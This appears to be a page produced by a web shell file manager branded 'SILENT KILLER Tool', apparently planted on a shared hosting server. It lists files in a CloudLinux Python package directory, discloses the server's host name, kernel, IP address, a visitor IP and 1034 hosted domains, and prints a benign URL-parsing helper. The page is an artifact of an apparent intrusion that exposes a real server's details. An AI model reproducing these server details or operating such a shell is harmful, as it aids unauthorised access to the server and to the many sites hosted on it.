Current Path: > > opt > cloudlinux > venv > lib64 > python3.11 > site-packages > wmt > common
Operation : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 162.0.232.56 | Your IP: 216.73.216.111 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
__pycache__ | Directory | - | - | |
__init__.py | File | 270 bytes | June 09 2025 16:45:51. | |
config.py | File | 4769 bytes | June 09 2025 16:45:51. | |
const.py | File | 1081 bytes | June 09 2025 16:45:51. | |
exceptions.py | File | 942 bytes | June 09 2025 16:45:51. | |
notification.py | File | 10200 bytes | June 09 2025 16:45:51. | |
report.py | File | 5474 bytes | June 09 2025 16:45:51. | |
service.py | File | 807 bytes | June 09 2025 16:45:51. | |
url_parser.py | File | 465 bytes | June 09 2025 16:45:51. | |
utils.py | File | 5370 bytes | June 09 2025 16:45:51. |
from urllib.parse import urlparse, ParseResult def parse(domain: str, scheme: str = 'http') -> str: """ Convert domain name to 'http://www.domain.com' format """ # https://stackoverflow.com/questions/21659044/how-can-i-prepend-http-to-a-url-if-it-doesnt-begin-with-http p = urlparse(domain, 'http') netloc = p.netloc or p.path path = p.path if p.netloc else '' p = ParseResult(p.scheme, netloc, path, *p[3:]) return p.geturl()
SILENT KILLER Tool